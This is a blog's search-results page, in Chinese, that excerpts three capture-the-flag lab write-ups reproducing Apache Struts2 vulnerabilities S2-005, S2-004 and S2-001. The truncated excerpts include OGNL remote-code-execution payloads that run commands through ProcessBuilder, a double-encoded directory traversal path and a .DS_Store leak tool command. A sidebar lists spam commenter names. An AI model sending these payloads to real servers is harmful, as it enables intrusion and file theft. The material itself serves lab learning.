TypechoJoeTheme

mmzkyl

搜索到 3 篇与 Struts2 的结果 ———
2021-11-11

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-005)复现

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-005)复现
随笔 2021-11-11 11:25 可以通过访问如下路径判断是否为Struts2框架 /struts/webconsole.html 2021-11-11 21:34 Struts2利用方式存在两种,一种有回显信息,一种无回显信息,此处仅记录有回显信息的利用方式 目标靶场 解题步骤 又是熟悉的 .action 后缀 先通过响应信息查看中间件信息 还是老老实实跟着题目提示走,尝试寻找Struts2 S2-005的利用方式 访问首页,然后使用burp suite抓包 修改请求方式,将其改为POST请求方式 将POC插入到请求正文即可 redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder...
mmzkyl
2021-11-11

学习笔记

314 阅读
0 评论
2021年11月11日
314 阅读
0 评论
2021-11-11

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-004)复现

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-004)复现
随笔 2021-11-11 10:38 一般来说,文件后缀为 .action 的基本为Struts2框架,虽然这个后缀能够自定义修改,但是大部分还是默认 .action 后缀 2021-11-11 10:48 Struts2 S2-004 为目录遍历漏洞 2021-11-11 10:50 因为题目没看清楚,所以寻找Key的所在位置花了挺久时间 目标靶场 解题步骤 进入首页 由访问路径后缀可确定此为Struts2框架 该环境为Struts2 S2-004漏洞复现,测试能否直接利用该漏洞 # %252f -> / 进行两次URL编码所得 /struts/..%252f 确定存在目录遍历漏洞,尝试寻找Key所在 一层一层目录进行寻找,直至找到了根目录也没有找到包含Key关键词的文件,但是在根目录存在另一个文件 .DS_Store ,有了这个文件又看到了曙光 .DS_Store 一般会存在 .DS_Store 文件泄露漏洞,使用工具(工具链接)尝试还原其目录信息,从而寻找Key所在 python ds_store_exp.py http://219.15...
mmzkyl
2021-11-11

学习笔记

181 阅读
0 评论
2021年11月11日
181 阅读
0 评论
2021-11-10

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-001)复现

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-001)复现
随笔 2021-11-10 15:48 我原本的想法是通过命令执行过于繁琐,尝试向其写入webshell,然后通过webshell进行管理,这样会比较方便,不过webshell一直没有写入成功 2021-11-10 15:51 该命令执行是无法直接使用空格的,具体示例如下 ``` %{ a=(new java.lang.ProcessBuilder(new java.lang.String[]{"find / -iname key.txt"})).redirectErrorStream(true).start(), b=#a.getInputStream(), c=new java.io.InputStreamReader(#b), d=new java.io.BufferedReader(#c), e=new char[50000], d.read(#e), f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), f.getWriter().println(new ...
mmzkyl
2021-11-10

学习笔记

233 阅读
0 评论
2021年11月10日
233 阅读
0 评论

互动读者

  • 在线博彩闲逛

    评论 4 次 | 文章 0 篇

  • เว็บสล็อต pg เว็บตรง闲逛

    评论 1 次 | 文章 0 篇

  • nude in public闲逛

    评论 1 次 | 文章 0 篇

  • hydro spa shower head闲逛

    评论 1 次 | 文章 0 篇

标签云